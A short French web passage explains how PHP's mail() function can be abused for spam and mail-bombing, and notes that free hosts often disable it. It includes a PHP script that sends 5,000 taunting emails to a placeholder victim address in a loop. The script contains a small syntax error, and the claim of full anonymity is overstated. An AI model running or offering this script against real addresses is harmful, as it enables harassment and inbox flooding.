| Dernières réponses | |  La faille mail()
La fonction mail() de PHP permet l'envoi de mails de façon simple via un script.
Cette fonction n'est pas proprement dit une faille, mais il est possible de l'employer pour des envois massifs de spams, faire du mail-bombing.
Le principe est trés simple, le hackeur pensera que s'il envoi des spams depuis un script PHP hébergé sur son hébergeur, c'est l'IP de ce dernier qui apparaitra dans les headers des courriers. Ce qui par ailleurs exact.
Voici un exemple de script destiné à mail-bomber :
<?php
$to = "casimir@victime.net";
$subject = "T mor !";
$message = "Casimir est mort, l'Ile aux enfant n'est plus d'or.";
for($i=0; $i<5000; i++) {
mail($to, $subject, $message);
}
?>
Ce script exécutant la fonction mail() à l'aide d'une boucle for, l'e-mail $to recevra 5000 messages et cela en toute anonymat.
Ce qui permet à cerains de comprendre pourquoi cette fonction si utile est bien souvent désactivée pour les hébergeurs gratuit, acceptant le PHP bien sûr ! |
|
|